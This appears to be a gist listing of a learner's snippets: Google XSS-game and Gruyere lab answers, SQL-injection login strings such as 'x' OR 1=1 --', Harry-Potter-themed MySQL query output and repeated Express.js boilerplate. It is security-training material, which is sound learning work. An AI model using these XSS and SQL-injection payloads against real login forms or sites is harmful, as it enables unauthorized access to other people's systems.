BLOT Martial MartialBlot

## google XSS
Challenge 1 --------------
<script>alert('bjobjob')</script>

Challenge 2 --------------
<input class="share" value="Share status!" onclick="return alert('dfdf');">

## gist:d8e534607b29ce7f8478d85677ff3c4b
------- 1
login: "admin'--"
password: "';--"

------- 2
login: "x' OR 1=1 -- "
password: "$INPUT2$"

## Gruyere Delete Snippets
 https://google-gruyere.appspot.com/GRUYEREINSTANCEID/deletesnippet?index=0

## Mysql.sql
//1
mysql> select team.name, count(*) as nb_player from team join player on team.id=player.team_id GROUP BY team.name ORDER BY nb_player desc;
+------------+-----------+
| name       | nb_player |
+------------+-----------+
| Gryffindor |        36 |
| Slytherin  |        21 |
| Ravenclaw  |        15 |
| Hufflepuff |        12 |
+------------+-----------+

## index.js
const express = require('express');
const app = express();
const port = 3000;
const connection = require('./conf');

app.disable('etag');

const bodyParser = require('body-parser');
// Support JSON-encoded bodies
app.use(bodyParser.json());

## index.js
const express = require('express');
const app = express();
const port = 3000;
const connection = require('./conf');

app.disable('etag');

const bodyParser = require('body-parser');
// Support JSON-encoded bodies
app.use(bodyParser.json());

## index.js
const express = require('express');
const app = express();
const port = 3000;
const connection = require('./conf');

app.disable('etag');

const bodyParser = require('body-parser');
// Support JSON-encoded bodies
app.use(bodyParser.json());

## Capture
// Order Alph firstname

mysql> SELECT firstname, lastname, role, name FROM player JOIN wizard ON (wizard.id=player.wizard_id) JOIN team ON (team.id=player.team_id) ORDER BY firstname;
+-------------+-----------------+--------+------------+
| firstname   | lastname        | role   | name       |
+-------------+-----------------+--------+------------+
| Aberforth   | Dumbledore      | keeper | Gryffindor |
| Albus       | Dumbledore      | chaser | Gryffindor |
| Alice       | Longbottom      | beater | Gryffindor |
| Alicia      | Spinnet         | chaser | Gryffindor |

## index.js
const express = require('express');
const app = express();
const port = 3000;
const connection = require('./conf');

app.disable('etag');

app.get('/api/movies', (req, res) => {
    connection.query('SELECT * from movies', (err, results) => {
        if (err) {

## Index.js
const express = require('express');
const app = express();
const port = 3000;

app.disable('etag');

app.get('/api/movies', (request, response) => {
    response.send('Récupération de tous les films');
});
	Challenge 1 --------------
	<script>alert('bjobjob')</script>

	Challenge 2 --------------
	<input class="share" value="Share status!" onclick="return alert('dfdf');">
	------- 1
	login: "admin'--"
	password: "';--"

	------- 2
	login: "x' OR 1=1 -- "
	password: "$INPUT2$"
	//1
	mysql> select team.name, count(*) as nb_player from team join player on team.id=player.team_id GROUP BY team.name ORDER BY nb_player desc;
	+------------+-----------+
	\| name \| nb_player \|
	+------------+-----------+
	\| Gryffindor \| 36 \|
	\| Slytherin \| 21 \|
	\| Ravenclaw \| 15 \|
	\| Hufflepuff \| 12 \|
	+------------+-----------+
	const express = require('express');
	const app = express();
	const port = 3000;
	const connection = require('./conf');

	app.disable('etag');

	const bodyParser = require('body-parser');
	// Support JSON-encoded bodies
	app.use(bodyParser.json());
	// Order Alph firstname

	mysql> SELECT firstname, lastname, role, name FROM player JOIN wizard ON (wizard.id=player.wizard_id) JOIN team ON (team.id=player.team_id) ORDER BY firstname;
	+-------------+-----------------+--------+------------+
	\| firstname \| lastname \| role \| name \|
	+-------------+-----------------+--------+------------+
	\| Aberforth \| Dumbledore \| keeper \| Gryffindor \|
	\| Albus \| Dumbledore \| chaser \| Gryffindor \|
	\| Alice \| Longbottom \| beater \| Gryffindor \|
	\| Alicia \| Spinnet \| chaser \| Gryffindor \|